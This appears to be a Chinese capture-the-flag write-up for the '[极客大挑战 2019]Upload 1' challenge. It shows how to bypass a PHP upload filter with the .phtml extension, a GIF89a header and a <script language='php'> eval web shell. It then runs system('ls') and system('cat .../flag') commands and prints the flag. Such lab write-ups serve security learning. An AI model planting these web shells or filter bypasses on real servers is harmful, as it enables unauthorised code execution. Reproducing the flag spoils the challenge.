[极客大挑战 2019]Upload 1
  UmY4CJ2kVTVZ 3天前 26 0

打开靶机,发现php后缀被过滤且发现没有文件包含漏洞

发现.phtml能绕过后缀检测,又显示没有图片
//PHTML 扩展名是 PHP 的一个模块,它允许在 HTML 文件中使用 PHP 代码,并且可以将 PHP 代码和 HTML 代码合并到一个文件中。

尝试在图片中加入gif文件头GIF89a发现能成功上传

尝试写入后门代码显示<?被过滤

我们尝试另一种写法来绕过

<script language="php">eval($_POST['cmd']);</script>

成功上传

访问/upload/1.phtml post提交cmd=system('ls ../../../../');找到flag位置
查找flagcmd=system('cat ../../../../flag');

flag{5d4065a9-9875-4a66-a553-dad8d627e8b3}

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 3天前 0

暂无评论

推荐阅读
UmY4CJ2kVTVZ